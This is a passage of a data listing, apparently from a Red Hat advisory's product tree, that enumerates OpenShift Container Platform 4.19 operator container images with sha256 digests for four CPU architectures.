"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
